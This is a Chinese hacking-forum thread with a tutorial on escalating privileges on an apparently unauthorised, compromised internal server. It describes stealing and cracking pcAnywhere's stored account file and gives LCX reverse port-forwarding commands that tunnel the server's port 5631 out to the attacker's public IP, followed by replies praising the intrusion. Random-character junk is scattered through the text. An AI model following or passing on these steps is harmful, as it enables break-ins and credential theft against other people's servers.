返回列表 发帖

[原创文章] pcanywhere之内网提权

很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
5 @" B* `, z, X! L+ Y
4 w0 n, \/ r, M) l8 L提权方法:pcanywhere+LCX
3 d. ^' M) X: w) l% A5 R
& W, T6 J+ g4 O1 T获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。9 ]2 ^" W8 M$ q- r0 w) ?" a
6 m4 c1 m- M4 I4 p
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。; Q9 d; z9 [8 O
3 z9 {3 z5 l2 \7 Y  e
" E# ^# r5 `% B0 `) a
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
. }1 Q) Z; j1 M4 B1 e7 `0 w8 y  Q( r. |9 G1 {7 d( w
5 }: F4 J- R/ G6 U* d3 E: O
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。0 G" j% D0 p& S, Q6 ?( Z
2 y1 T6 @2 M0 k$ _2 {7 ?6 C

4 I" n( D! \5 z/ h+ u1 t; J- T* R% ?
9 {# N+ g* j8 F) a
" e7 z2 a$ Z$ a8 X2 u( G由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
6 [: @  t- h0 t
" s' _6 I- @, w( J" t
, g9 I2 y5 R/ y* SLCX的用法再简单说下:4 V. h  x  X& \: {" `
$ F3 S) b. ~2 @3 x' m0 U/ W
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
; j4 a8 ~5 O2 x2 U
0 Y0 ~7 r" i8 v/ S/ ~2 ^本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
$ o9 A5 {$ F0 L& N* y
5 e% f7 }5 _4 a由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。3 o/ w& a. a- Y; x& q! k
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``$ H8 m+ }( |' \

# ]% a! W9 Y, g" D. h4 V) x8 A. f1 ?& ~% q5 C  l' q

3 s9 p6 {9 J7 M$ f/ Z6 |6 n& c
. f# ]% M+ c* J% ?1 y呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。/ y( R  J. |) R0 c1 b3 Z

7 t1 F, v) m/ M& v( e* \8 a( z$ E' u& u' H$ K" _7 D6 A
/ R( }7 D+ O) V1 e7 C
* s. U" L; u% u3 _! F
我们本地连接试试,输入我们刚破解的账号密码
7 `5 a9 Z1 I0 A6 H
8 }2 Q* h- r! F2 G/ ?& E! q
( T7 W9 o& ~5 N1 Y* y+ X" q. X呵呵``连接成功,服务器不错,又一个8核^︵^$ K6 l  K% C# r7 v5 {/ Z: Y
! |/ o) e- b2 s
! I' _- b8 K; @3 {+ N3 L" m. E

* R; X- t3 {& o" K$ {
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
1

评分人数

  • 柔肠寸断

不错不错。。。你的貌似一直都是内网服务器哈
希望做站长本人的学生请点击
http://www.3ast.com/viewthread.php?tid=13841
QQ790653916只负责SEO以及收费教学等方面联系,他人勿扰

于智者同行,你会不同凡响;与高人为伍,你会登上巅峰

TOP

哎。。。。运气不佳```老碰见内网的。。。。

TOP

八核的哟

TOP

顶起。。。。。。。。。
希望做站长本人的学生请点击
http://www.3ast.com/viewthread.php?tid=13841
QQ790653916只负责SEO以及收费教学等方面联系,他人勿扰

于智者同行,你会不同凡响;与高人为伍,你会登上巅峰

TOP

但是我反弹后连接总是不成功,试着转发5632,5631一起,还是不行.

TOP

返回列表